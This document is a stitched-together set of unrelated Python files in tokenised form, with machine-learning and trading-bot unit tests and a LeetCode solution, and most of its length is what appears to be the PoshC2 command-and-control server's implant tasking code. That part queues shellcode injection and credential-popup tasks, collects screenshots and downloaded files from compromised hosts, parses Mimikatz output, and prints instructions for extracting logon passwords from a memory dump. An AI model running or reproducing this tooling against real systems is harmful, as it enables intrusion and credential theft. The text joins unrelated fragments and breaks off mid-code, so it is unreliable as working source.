file that does not exist. <with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.ValidateTarFile('blah.no')<block_end># Raise exception for a file with unsupported extension. <with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.ValidateTarFile(self.tmp_files_dir)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
__all__=['a_star' 'best_first' 'bi_a_star' 'breadth_first' 'dijkstra' 'finder' 'ida_star']<line_sep>
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ test Activations """<import_stmt>numpy<as>np<import_stmt>mindspore.nn<as>nn<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore.common.api _cell_graph_executor<import_from_stmt>..ut_filter non_graph_engine<class_stmt>SoftmaxNet(nn.Cell)<block_start><def_stmt>__init__ self dim<block_start>super(SoftmaxNet self).__init__()<line_sep>self.softmax=nn.Softmax(dim)<block_end><def_stmt>construct self x<block_start><return>self.softmax(x)<block_end><block_end>@non_graph_engine<def_stmt>test_compile <block_start>net=SoftmaxNet(0)<line_sep>input_tensor=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>net(input_tensor)<block_end>@non_graph_engine<def_stmt>test_compile_axis <block_start>net=SoftmaxNet(-1)<line_sep>prob=355<line_sep>input_data=np.random.randn(4 16 1 1).astype(np.float32)<times>prob<line_sep>input_tensor=Tensor(input_data)<line_sep>net(input_tensor)<block_end><class_stmt>LogSoftmaxNet(nn.Cell)<block_start><def_stmt>__init__ self dim<block_start>super(LogSoftmaxNet self).__init__()<line_sep>self.logsoftmax=nn.LogSoftmax(dim)<block_end><def_stmt>construct self x<block_start><return>self.logsoftmax(x)<block_end><block_end>@non_graph_engine<def_stmt>test_compile_logsoftmax <block_start>net=LogSoftmaxNet(0)<line_sep>input_tensor=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>net(input_tensor)<block_end><class_stmt>Net1(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net1 self).__init__()<line_sep>self.relu=nn.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><block_end><def_stmt>test_compile_relu <block_start>net=Net1()<line_sep>input_data=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end><class_stmt>Net_gelu(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net_gelu self).__init__()<line_sep>self.gelu=nn.GELU()<block_end><def_stmt>construct self x<block_start><return>self.gelu(x)<block_end><block_end><def_stmt>test_compile_gelu <block_start>net=Net_gelu()<line_sep>input_data=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end><class_stmt>NetLeakyReLU(nn.Cell)<block_start><def_stmt>__init__ self alpha<block_start>super(NetLeakyReLU self).__init__()<line_sep>self.leaky_relu=nn.LeakyReLU(alpha)<block_end><def_stmt>construct self x<block_start><return>self.leaky_relu(x)<block_end><block_end><def_stmt>test_compile_leaky_relu <block_start>net=NetLeakyReLU(alpha=0.1)<line_sep>input_data=Tensor(np.array([[1.6 0 0.6] [6 0 -6]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end>
<class_stmt>Solution(object)<block_start><def_stmt>reverseVowels self s<block_start>""" :type s: str :rtype: str """<line_sep>vowels=set("aeiouAEIOU")<line_sep>s=list(s)<line_sep>i=0<line_sep>j=len(s)-1<while_stmt>i<l>j<block_start><while_stmt>i<l>j<and>s[i]<not><in>vowels<block_start>i<augadd>1<block_end><while_stmt>i<l>j<and>s[j]<not><in>vowels<block_start>j<augsub>1<block_end><if_stmt>i<l>j<block_start>s[i],s[j]=s[j] s[i]<line_sep>i<augadd>1<line_sep>j<augsub>1<block_end><block_end><return>''.join(s)<block_end><block_end>
<import_from_stmt>nndet.evaluator.detection.froc FROCMetric<import_from_stmt>nndet.evaluator.detection.coco COCOMetric<import_from_stmt>nndet.evaluator.detection.hist PredictionHistogram<line_sep>
# Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tensorflow_transform.test_case."""<import_stmt>re<import_from_stmt>tensorflow_transform test_case<import_stmt>unittest<class_stmt>TftUnitTest(test_case.TransformTestCase)<block_start><def_stmt>testCrossNamedParameters self<block_start>test_cases_1=[{'testcase_name':'a_1_b_1' 'a':1 'b':1} {'testcase_name':'a_3_b_3' 'a':3 'b':3} ]<line_sep>test_cases_2=[{'testcase_name':'c_2' 'c':2} {'testcase_name':'c_4' 'c':4} ]<line_sep>expected_cross=[{'testcase_name':'a_1_b_1_c_2' 'a':1 'b':1 'c':2} {'testcase_name':'a_1_b_1_c_4' 'a':1 'b':1 'c':4} {'testcase_name':'a_3_b_3_c_2' 'a':3 'b':3 'c':2} {'testcase_name':'a_3_b_3_c_4' 'a':3 'b':3 'c':4} ]<line_sep>self.assertEqual(test_case.cross_named_parameters(test_cases_1 test_cases_2) expected_cross)<block_end><def_stmt>testCrossParameters self<block_start>test_cases_1=[('a' 1) ('b' 2)]<line_sep>test_cases_2=[(<true> ) (<false> )]<line_sep>expected_cross=[('a' 1 <true>) ('b' 2 <true>) ('a' 1 <false>) ('b' 2 <false>) ]<line_sep>self.assertCountEqual(test_case.cross_parameters(test_cases_1 test_cases_2) expected_cross)<block_end><def_stmt>testAssertDataCloseOrEqual self<block_start>self.assertDataCloseOrEqual([{'a':'first' 'b':1.0 'c':5 'd':('second' 2.0)} {'e':2 'f':3}] [{'a':'first' 'b':1.0000001 'c':5 'd':('second' 2.0000001)} {'e':2 'f':3}])<with_stmt>self.assertRaisesRegexp(AssertionError r'len\(.*\) != len\(\[\]\)')<block_start>self.assertDataCloseOrEqual([{'a':1}] [])<block_end><with_stmt>self.assertRaisesRegexp(AssertionError re.compile('Element counts were not equal.*: Row 0' re.DOTALL))<block_start>self.assertDataCloseOrEqual([{'a':1}] [{'b':1}])<block_end><with_stmt>self.assertRaisesRegexp(AssertionError re.compile('Not equal to tolerance.*: Row 0, key a' re.DOTALL))<block_start>self.assertDataCloseOrEqual([{'a':1}] [{'a':2}])<block_end><block_end>@test_case.parameters((1 'a') (2 'b'))<def_stmt>testSampleParametrizedTestMethod self my_arg my_other_arg<block_start>self.assertIn((my_arg my_other_arg) {(1 'a') (2 'b')})<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>decimal Decimal<import_from_stmt>unittest TestCase<import_from_stmt>hummingbot.core.utils.fixed_rate_source FixedRateSource<class_stmt>FixedRateSourceTests(TestCase)<block_start><def_stmt>test_look_for_unconfigured_pair_rate self<block_start>rate_source=FixedRateSource()<line_sep>self.assertIsNone(rate_source.rate("BTC-USDT"))<block_end><def_stmt>test_get_rate self<block_start>rate_source=FixedRateSource()<line_sep>rate_source.add_rate("BTC-USDT" Decimal(40000))<line_sep>self.assertEqual(rate_source.rate("BTC-USDT") Decimal(40000))<block_end><def_stmt>test_get_rate_when_inverted_pair_is_configured self<block_start>rate_source=FixedRateSource()<line_sep>rate_source.add_rate("BTC-USDT" Decimal(40000))<line_sep>self.assertEqual(rate_source.rate("USDT-BTC") Decimal(1)/Decimal(40000))<block_end><def_stmt>test_string_representation self<block_start>self.assertEqual(str(FixedRateSource()) "fixed rates")<block_end><block_end>
<import_stmt>datetime hashlib base64 traceback os re<import_stmt>poshc2.server.database.DB<as>DB<import_from_stmt>poshc2.Colours Colours<import_from_stmt>poshc2.server.Config ModulesDirectory DownloadsDirectory ReportsDirectory<import_from_stmt>poshc2.server.Implant Implant<import_from_stmt>poshc2.server.Core decrypt encrypt default_response decrypt_bytes_gzip number_of_days process_mimikatz print_bad<import_from_stmt>poshc2.server.Core load_module load_module_sharp encrypt default_response<import_from_stmt>poshc2.server.payloads.Payloads Payloads<import_from_stmt>poshc2.server.PowerStatus translate_power_status<import_from_stmt>poshc2.Utils randomuri<def_stmt>newTaskOutput uriPath cookieVal post_data wsclient=<false><block_start>now=datetime.datetime.now()<line_sep>all_implants=DB.get_implants_all()<if_stmt><not>all_implants<block_start>print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")<line_sep><return><block_end><for_stmt>implant all_implants<block_start>implantID=implant.ImplantID<line_sep>RandomURI=implant.RandomURI<line_sep>Hostname=implant.Hostname<line_sep>encKey=implant.Key<line_sep>Domain=implant.Domain<line_sep>User=implant.User<line_sep>implant_type=implant.Pivot<if_stmt>RandomURI<in>uriPath<and>cookieVal<block_start>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep>decCookie=decrypt(encKey cookieVal)<if_stmt>implant_type<eq>"JXA"<block_start>rawoutput=decrypt(encKey post_data[1500:])<block_end><else_stmt><block_start>rawoutput=decrypt_bytes_gzip(encKey post_data[1500:])<block_end><if_stmt>decCookie.startswith("Error")<block_start>print(Colours.RED)<line_sep>print("The multicmd errored: ")<line_sep>print(rawoutput)<line_sep>print(Colours.GREEN)<line_sep><return><block_end>cookieMsg=""<if_stmt>"-"<in>decCookie<block_start>decCookie=decCookie.strip('\x00')<line_sep>splt=decCookie.split("-")<if_stmt><not>splt[0].isdigit()<block_start>print(Colours.RED+"[!] Cookie %s is invalid"%decCookie+Colours.GREEN)<line_sep><return><block_end><else_stmt><block_start>taskId=str(int(splt[0]))<line_sep>cookieMsg=splt[1]<block_end><block_end><else_stmt><block_start>taskId=str(int(decCookie.strip('\x00')))<block_end>taskIdStr="0"<times>(5-len(str(taskId)))+str(taskId)<if_stmt>taskId<ne>"99999"<block_start>executedCmd=DB.get_cmd_from_task_id(taskId)<line_sep>task_owner=DB.get_task_owner(taskId)<block_end><else_stmt><block_start>print(Colours.END)<line_sep>timenow=now.strftime("%Y-%m-%d %H:%M:%S")<line_sep>print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)"%ReportsDirectory)<line_sep>print(Colours.GREEN)<line_sep>print(rawoutput)<line_sep>miscData=open(("%sbackground-data.txt"%ReportsDirectory) "a+")<line_sep>miscData.write(rawoutput)<line_sep><return><block_end>print(Colours.GREEN)<if_stmt>task_owner<is><not><none><block_start>print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr task_owner implantID Domain User Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><else_stmt><block_start>print("Task %s returned against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr implantID Domain User Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><try_stmt><block_start>outputParsed=re.sub(r'123456(.+?)654321' '' rawoutput)<line_sep>outputParsed=outputParsed.rstrip()<block_end><except_stmt>Exception<block_start><pass><block_end><if_stmt>cookieMsg<is><not><none><and>cookieMsg.lower().startswith("pwrstatusmsg")<block_start>translate_power_status(outputParsed RandomURI)<line_sep><return><block_end><if_stmt>"loadmodule"<in>executedCmd<and>len(outputParsed.split())<eq>0<block_start>print("Module loaded successfully")<line_sep>DB.update_task(taskId "Module loaded successfully")<block_end><elif_stmt>"pbind-connect "<in>executedCmd<and>"PBind-Connected"<in>outputParsed<or>"PBind PBind start"<in>executedCmd<and>"PBind-Connected"<in>outputParsed<block_start>outputParsed=re.search("PBind-Connected:.*" outputParsed)<line_sep>outputParsed=outputParsed[0].replace("PBind-Connected: " "")<line_sep>Domain,User,Hostname,Arch,PID,Proxy=str(outputParsed).split(";")<line_sep>Proxy=Proxy.replace("\x00" "")<if_stmt>"\\"<in>User<block_start>User=User[User.index("\\")+1:]<block_end>PivotString="C# PBind"<if_stmt>"pbind-command run-exe PBind PBind start"<in>executedCmd<block_start>PivotString="C# PBind Pivot"<block_end>newImplant=Implant(implantID PivotString str(Domain) str(User) str(Hostname) Arch PID <none>)<line_sep>newImplant.save()<line_sep>newImplant.display()<line_sep>newImplant.autoruns()<if_stmt>"pbind-command run-exe PBind PBind start"<in>executedCmd<block_start>DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><else_stmt><block_start>DB.new_task("pbind-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><block_end><elif_stmt>"fcomm-connect "<in>executedCmd<and>"FComm-Connected"<in>outputParsed<block_start>outputParsed=re.search("FComm-Connected:.*" outputParsed)<line_sep>outputParsed=outputParsed[0].replace("FComm-Connected: " "")<line_sep>Domain,User,Hostname,Arch,PID,Proxy=str(outputParsed).split(";")<line_sep>Proxy=Proxy.replace("\x00" "")<if_stmt>"\\"<in>User<block_start>User=User[User.index("\\")+1:]<block_end>newImplant=Implant(implantID "C# FComm" str(Domain) str(User) str(Hostname) Arch PID <none>)<line_sep>newImplant.save()<line_sep>newImplant.display()<line_sep>newImplant.autoruns()<line_sep>DB.new_task("fcomm-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><elif_stmt>executedCmd.lower().startswith("beacon ")<block_start>new_sleep=executedCmd.replace('beacon ' '').strip()<line_sep>DB.update_sleep(new_sleep RandomURI)<block_end><elif_stmt>"get-screenshot"<in>executedCmd.lower()<block_start><try_stmt><block_start>decoded=base64.b64decode(outputParsed)<line_sep>filename=implant.User+"-"+now.strftime("%m%d%Y%H%M%S_"+randomuri())<line_sep>output_file=open('%s%s.png'%(DownloadsDirectory filename) 'wb')<line_sep>print("Screenshot captured: %s%s.png"%(DownloadsDirectory filename))<line_sep>DB.update_task(taskId "Screenshot captured: %s%s.png"%(DownloadsDirectory filename))<line_sep>output_file.write(decoded)<line_sep>output_file.close()<block_end><except_stmt>Exception<block_start>DB.update_task(taskId "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")<line_sep>print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")<block_end><block_end><elif_stmt>(executedCmd.lower().startswith("$shellcode64"))<or>(executedCmd.lower().startswith("$shellcode64"))<block_start>DB.update_task(taskId "Upload shellcode complete")<line_sep>print("Upload shellcode complete")<block_end><elif_stmt>(executedCmd.lower().startswith("run-exe core.program core inject-shellcode"))<or>(executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode"))<or>(executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode"))<block_start>DB.update_task(taskId "Upload shellcode complete")<line_sep>print(outputParsed)<block_end><elif_stmt>"download-file"<in>executedCmd.lower()<block_start><try_stmt><block_start>filename=executedCmd.lower().replace("download-files " "")<line_sep>filename=filename.replace("download-file " "")<line_sep>filename=filename.replace("-source " "")<line_sep>filename=filename.replace(".." "")<line_sep>filename=filename.replace("'" "")<line_sep>filename=filename.replace('"' "")<line_sep>filename=filename.replace("\\" "/")<line_sep>directory,filename=filename.rsplit('/' 1)<line_sep>filename=filename.rstrip('\x00')<line_sep>original_filename=filename.strip()<if_stmt><not>original_filename<block_start>directory=directory.rstrip('\x00')<line_sep>directory=directory.replace("/" "_").replace("\\" "_").strip()<line_sep>original_filename=directory<block_end><try_stmt><block_start><if_stmt>rawoutput.startswith("Error")<block_start>print("Error downloading file: ")<line_sep>print(rawoutput)<line_sep><break><block_end>chunkNumber=rawoutput[:5]<line_sep>totalChunks=rawoutput[5:10]<block_end><except_stmt>Exception<block_start>chunkNumber=rawoutput[:5].decode("utf-8")<line_sep>totalChunks=rawoutput[5:10].decode("utf-8")<block_end><if_stmt>(chunkNumber<eq>"00001")<and>os.path.isfile('%s%s'%(DownloadsDirectory filename))<block_start>counter=1<while_stmt>(os.path.isfile('%s%s'%(DownloadsDirectory filename)))<block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter)<block_end>counter<augadd>1<block_end><block_end><if_stmt>(chunkNumber<ne>"00001")<block_start>counter=1<if_stmt><not>os.path.isfile('%s%s'%(DownloadsDirectory filename))<block_start>print("Error trying to download part of a file to a file that does not exist: %s"%filename)<block_end><while_stmt>(os.path.isfile('%s%s'%(DownloadsDirectory filename)))# First find the 'next' file would be downloaded to <block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter)<block_end>counter<augadd>1<block_end><if_stmt>counter<ne>2# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter <block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter-2)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter-2)<block_end><block_end><else_stmt><block_start>filename=original_filename<block_end><block_end>print("Download file part %s of %s to: %s"%(chunkNumber totalChunks filename))<line_sep>DB.update_task(taskId "Download file part %s of %s to: %s"%(chunkNumber totalChunks filename))<line_sep>output_file=open('%s%s'%(DownloadsDirectory filename) 'ab')<try_stmt><block_start>output_file.write(rawoutput[10:])<block_end><except_stmt>Exception<block_start>output_file.write(rawoutput[10:].encode("utf-8"))<block_end>output_file.close()<block_end><except_stmt>Exception<as>e<block_start>DB.update_task(taskId "Error downloading file %s "%e)<line_sep>print("Error downloading file %s "%e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>"safetydump"<in>executedCmd.lower()<block_start>rawoutput=decrypt_bytes_gzip(encKey post_data[1500:])<if_stmt>rawoutput.startswith("[-]")<or>rawoutput.startswith("ErrorCmd")<block_start>DB.update_task(taskId rawoutput)<line_sep>print(rawoutput)<block_end><else_stmt><block_start>dumpname="SafetyDump-Task-%s.b64"%taskIdStr<line_sep>dumppath="%s%s"%(DownloadsDirectory dumpname)<line_sep>open(dumppath 'w').write(rawoutput)<line_sep>message="Dump written to: %s"%dumppath<line_sep>message=message+"\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"<line_sep>message=message+"\n $filename = '.\\%s'"%dumpname<line_sep>message=message+"\n $b64 = Get-Content $filename"<line_sep>message=message+"\n $bytes = [System.Convert]::FromBase64String($b64)"<line_sep>message=message+"\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"<line_sep>message=message+"\n ./mimikatz.exe"<line_sep>message=message+"\n sekurlsa::minidump safetydump.dmp"<line_sep>message=message+"\n sekurlsa::logonpasswords"<line_sep>message=message+"\nOr to just decode on Linux:"<line_sep>message=message+f"\n base64 -id {dumpname} > dump.bin"<line_sep>DB.update_task(taskId message)<line_sep>print(message)<block_end><block_end><elif_stmt>(executedCmd.lower().startswith("run-exe safetykatz")<or>"invoke-mimikatz"<in>executedCmd<or>executedCmd.lower().startswith("pbind-")<or>executedCmd.lower().startswith("fcomm-command")<or>executedCmd.lower().startswith("run-dll sharpsploit"))<and>"logonpasswords"<in>outputParsed.lower()<block_start>print("Parsing Mimikatz Output")<line_sep>DB.update_task(taskId outputParsed)<line_sep>process_mimikatz(outputParsed)<line_sep>print(Colours.GREEN)<line_sep>print(outputParsed+Colours.END)<block_end><else_stmt><block_start>DB.update_task(taskId outputParsed)<line_sep>print(Colours.GREEN)<line_sep>print(outputParsed+Colours.END)<block_end><block_end><block_end><block_end><def_stmt>newTask path<block_start>all_implants=DB.get_implants_all()<line_sep>commands=""<if_stmt>all_implants<block_start><for_stmt>i all_implants<block_start>RandomURI=i.RandomURI<line_sep>Pivot=i.Pivot<line_sep>EncKey=i.Key<line_sep>tasks=DB.get_newtasks(RandomURI)<if_stmt>RandomURI<in>path<and>tasks<block_start><for_stmt>task tasks<block_start>command=task[2]<line_sep>user=task[3]<line_sep>user_command=command<line_sep>implant=DB.get_implantbyrandomuri(RandomURI)<line_sep>implant_type=DB.get_implanttype(RandomURI)<line_sep>now=datetime.datetime.now()<if_stmt>(command.lower().startswith("$shellcode64"))<or>(command.lower().startswith("$shellcode86")<or>command.lower().startswith("run-exe core.program core inject-shellcode")<or>command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode")<or>command.lower().startswith("pbind-command run-exe core.program core inject-shellcode")<or>command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode"))<block_start>user_command="Inject Shellcode: %s"%command[command.index("#")+1:]<line_sep>command=command[:command.index("#")]<block_end><elif_stmt>(command.lower().startswith("run-jxa "))<or>(command.lower().startswith("clipboard-monitor "))<or>(command.lower().startswith("cred-popper "))<block_start>user_command=command[:command.index("#")]<line_sep>command="run-jxa "+command[command.index("#")+1:]<block_end><elif_stmt>(command.lower().startswith('upload-file')<or>command.lower().startswith('pbind-command upload-file')<or>command.lower().startswith('fcomm-command upload-file'))<block_start>PBind=<false><line_sep>FComm=<false><if_stmt>command.lower().startswith('pbind-command upload-file')<block_start>PBind=<true><block_end><if_stmt>command.lower().startswith('fcomm-command upload-file')<block_start>FComm=<true><block_end>upload_args=command.replace('pbind-command upload-file' '').replace('fcomm-command upload-file' '').replace('upload-file' '')<line_sep>upload_file_args_split=upload_args.split()<if_stmt>len(upload_file_args_split)<l>2<block_start>print(Colours.RED)<line_sep>print("Error parsing upload command: %s"%upload_args)<line_sep>print(Colours.GREEN)<line_sep><continue><block_end>upload_file=upload_file_args_split[0]<line_sep>upload_file_destination=upload_file_args_split[1]<line_sep>upload_args=upload_args.replace(upload_file '')<line_sep>upload_args=upload_args.replace(upload_file_destination '')<with_stmt>open(upload_file "rb")<as>f<block_start>upload_file_bytes=f.read()<block_end><if_stmt><not>upload_file_bytes<block_start>print(Colours.RED+f"Error, no bytes read from the upload file, removing task: {upload_file}"+Colours.GREEN)<line_sep>DB.del_newtasks(str(task[0]))<line_sep><continue><block_end>upload_file_bytes_b64=base64.b64encode(upload_file_bytes).decode("utf-8")<if_stmt>implant_type.lower().startswith('c#')<block_start>command=f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('ps')<block_start>command=f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('py')<block_start>command=f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('jxa')<block_start>command=f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"<block_end><else_stmt><block_start>print(Colours.RED)<line_sep>print("Error parsing upload command: %s"%upload_args)<line_sep>print(Colours.GREEN)<block_end><if_stmt>PBind<block_start>command=f"pbind-command {command}"<block_end><if_stmt>FComm<block_start>command=f"fcomm-command {command}"<block_end>filehash=hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()<line_sep>user_command=f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"<block_end>taskId=DB.insert_task(RandomURI user_command user)<line_sep>taskIdStr="0"<times>(5-len(str(taskId)))+str(taskId)<if_stmt>len(str(taskId))<g>5<block_start><raise>ValueError('Task ID is greater than 5 characters which is not supported.')<block_end>print(Colours.YELLOW)<if_stmt>user<is><not><none><and>user<ne>""<block_start>print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr user implant.ImplantID implant.Domain implant.User implant.Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><else_stmt><block_start>print("Task %s issued against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr implant.ImplantID implant.Domain implant.User implant.Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><try_stmt><block_start><if_stmt>(user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute")<or>user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute")<or>user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute"))<block_start>print(user_command[0:200])<line_sep>print("----TRUNCATED----")<block_end><else_stmt><block_start>print(user_command)<block_end>print(Colours.END)<block_end><except_stmt>Exception<as>e<block_start>print("Cannot print output: %s"%e)<block_end><if_stmt>task[2].startswith("loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("loadmodule " "")<if_stmt>".exe"<in>module_name<block_start>modulestr=load_module_sharp(module_name)<block_end><elif_stmt>".dll"<in>module_name<block_start>modulestr=load_module_sharp(module_name)<block_end><else_stmt><block_start>modulestr=load_module(module_name)<block_end>command="loadmodule%s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>command=""<block_end><block_end><elif_stmt>task[2].startswith("run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("run-exe Program PS " "")<line_sep>modulestr=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe Program PS %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("pbind-pivot-command run-exe Program PS " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>modulestr=base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")<line_sep>doublebase64string=base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%doublebase64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("pbind-command run-exe Program PS " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>modulestr=base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("fcomm-command run-exe Program PS " "")<line_sep>modulestr=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe FComm.FCClass FComm run-exe Program PS %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pslo ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe Program PS loadmodule%s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pslo")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"run-exe Program PS loadmodule%s\""%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-pivot-loadmodule " "")<if_stmt>".exe"<in>module_name<or>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>base64string=base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")<line_sep>command=f"run-exe PBind PBind {base64string}"<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-pslo")<block_start><try_stmt><block_start>module_name=(task[2]).replace("fcomm-pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\""%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-loadmodule " "")<if_stmt>".exe"<in>module_name<block_start><for_stmt>modname 